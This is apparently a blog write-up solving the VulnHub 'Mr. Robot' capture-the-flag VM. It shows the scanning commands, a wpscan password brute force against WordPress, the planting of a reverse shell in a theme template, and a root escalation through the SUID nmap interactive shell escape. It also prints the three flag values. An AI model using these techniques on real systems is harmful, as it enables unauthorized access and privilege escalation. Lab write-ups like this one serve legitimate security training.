Mr. Robot

Location

https://www.vulnhub.com

Description

Based on the show, Mr. Robot.

This VM has three keys hidden in different locations. Your goal is to find all three. Each key is progressively difficult to find.

The VM isn’t too difficult. There isn’t any advanced exploitation or reverse engineering. The level is considered beginner-intermediate.

Enumeration

Mr. Robot is one of the few Hollywood productions that captured the spirit of the black hat hacker right. I wonder if this challenge can maintain that reputation. Let’s find out and let’s start with gathering some information about the target.

nmap -A -T4 -sV -p- 192.168.110.3

nmap.JPG

Looks like port 80 and 443 are open.

screen1.JPG

When I try the commands I feel a little bit like Neo and got to choose between the red pill and the blue pill. But then I’m want to scratch the layers and search inside the source code. Let’s start with the basics. Robots.txt gives me the first flag and a fsociety wordlist.

073403c8a58a1f80d943455fb30724b9

Looks like a md5 hash to me. Hash-identifier confirms it. But unfortunately it’s not a know hash.

WordPress

When running Dirb, I get a long list with directories. One of them is the WordPress login page.

wp.JPG

I tried wpscan, but it couldn’t enumerate usernames. Also there weren’t a lot useful vulnerabilities to exploit. Time for some thinking and manual labor.

wp2

Looks like I have found an username. Let’s see if we can brute force the password of this account with the found wordlist. The wordlist contains 858160 words. That’s gonna take some time with brute force. Maybe I can trim it down a bit.

sort ‘fsocity.dic’ | uniq > fsociety.dic
wc fsociety.dic
11451 11451 96747 fsociety.dic

Much better. Now for wpscan again.

wpscan –url http://192.168.110.3 –wp-content-dir ‘/wp-login.php’ –wordlist /root/Documents/CTF/mrRobot/fsociety.dic –threads 50 –username elliot

wp3

With the username:password I log in to the WordPress account.

Getting a shell

wp-login

Let’s try and upload a dirty php.

forbidden.JPG

That’s not gonna work. Because there is no way for me to change the permission on the format restriction, I choose another path. I’m gonna adjust a page.

template

Let’s take to top one and replace the code with a reverse shell code from pentestmonkey.

shell.JPG

I’m in. Let’s grab a proper shell.

python -c ‘import pty;pty.spawn(“/bin/bash”)’

Inside the home directory there is a directory named robot which contained 2 files. One is the second flag and one contains the username ‘robot’ plus a hash. Looks like I need to crack this hash. Before using a time consuming tool, I check the hash with crackstation and it appears that it’s a known hash.

crack.JPG

Time to bump up my privileges.

daemon@linux:/home/robot$ su robot
Password: abcdefghijklmnopqrstuvwxyz

robot@linux:~$ id
uid=1002(robot) gid=1002(robot) groups=1002(robot)

Let’s get flag number 2.

robot@linux:~$ cd /home/robot/
robot@linux:~$ ls
key-2-of-3.txt password.raw-md5
robot@linux:~$ cat key-2-of-3.txt
822c73956184f694993bede3eb39f959

After I looked around some more in the system, I checked the installed applications to see what’s on this machine.

compgen -c | sort

compgen.JPG

It had an old version of nmap running. I will use the –interactive command to run a shell under the SUID root.

robot@linux:/$ nmap –interactive

Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode — press h <enter> for help
nmap> !sh
# id
uid=1002(robot) gid=1002(robot) euid=0(root) groups=0(root),1002(robot)

Flag number 3

Time to get the third and final flag.

# cat /root/key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4

The End!

I must say it was a fun challenge, but I really missed the continuation of the Mr. Robot theme inside the box. No themed clues or witty comments. Just obtaining root and collect the 3 flags.

Advertenties